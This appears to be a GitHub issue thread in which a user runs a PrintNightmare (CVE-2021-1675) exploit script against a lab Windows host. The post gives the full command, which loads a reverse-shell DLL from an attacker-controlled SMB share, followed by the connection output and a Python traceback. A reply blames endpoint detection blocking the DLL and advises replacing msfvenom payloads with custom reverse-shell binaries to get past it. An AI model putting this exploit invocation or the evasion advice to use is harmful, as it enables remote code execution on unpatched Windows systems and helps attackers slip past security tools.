SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been clo

[czz1233]

sudo python3 CVE-2021-1675.py test.local/chen:123.com@192.168.121.136 '\192.168.121.128\smb\reverse.dll' [] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL [] Executing \??\UNC\192.168.121.128\smb\reverse.dll [] Try 1... [] Stage0: 0 [] Try 2... [] Stage0: 0 [*] Try 3... Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx return self.read(tid, fid, offset, max_size, wait_answer) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read if ans.isValidAnswer(STATUS_SUCCESS): File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer raise smb3.SessionError(self['Status'], self) impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "/home/kali/CVE-2021-1675.py", line 192, in main(dce, pDriverPath, options.share) File "/home/kali/CVE-2021-1675.py", line 93, in main resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx return dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request answer = self.recv() File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv return self.__smb_connection.readFile(self.tid, self.handle) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile raise SessionError(e.get_error_code(), e.get_error_packet()) impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)

[MPereira95]

Hello! This error happens to me because my EDR detects and blocks the dll. Try making another dll or exe file and this error will disappear.

[czz1233]

Hello! This error happens to me because my EDR detects and blocks the dll. Try making another dll or exe file and this error will disappear.

How did you solve it

[MPereira95]

I stopped generating a dll with msfvenom! I wrote my own reverse shell exe and experimented, and I searched here in github reverse shell dll's to test and this error stopped.